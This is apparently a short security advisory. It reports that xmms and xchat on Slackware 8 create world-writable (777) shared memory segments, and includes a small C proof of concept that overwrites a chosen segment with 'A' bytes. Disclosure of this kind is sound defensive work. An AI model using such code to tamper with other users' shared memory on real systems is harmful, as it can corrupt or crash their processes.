xmms/xchat full access shared memory segments

[Julien VANEGUE <vanegu_j () epita fr>]

On slackware 8 :

bash-2.05$ ipcs -m

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status      
0x00000000 4216960    mayhem    777        196608     2          dest         
0x00000000 7636737    mayhem    777        196608     2          dest         

bash-2.05$ ipcs -p -m

------ Shared Memory Creator/Last-op --------
shmid      owner      cpid       lpid      
4216960    mayhem     3921       1406      
7636737    mayhem     26206      26209     

bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$ 



Seems not to be exploitable (no fault) but still need to be fixed .

/*
** test_shm.c
** 
** Made by Julien Vanegue
** Login   <mayhem () hert org>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>


#define FATAL(str) { perror(str); exit(-1); }


void    usage()
{
  fprintf(stderr, "syntax: a.out semid size \n");
  exit(-1);
}


int     main(int argc, char **argv)
{
  char  *addr;

  if (argc != 3)
    usage();
  if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
    FATAL("shmget");
  memset(addr, 'A', atoi(argv[2]));
  sleep(2);
}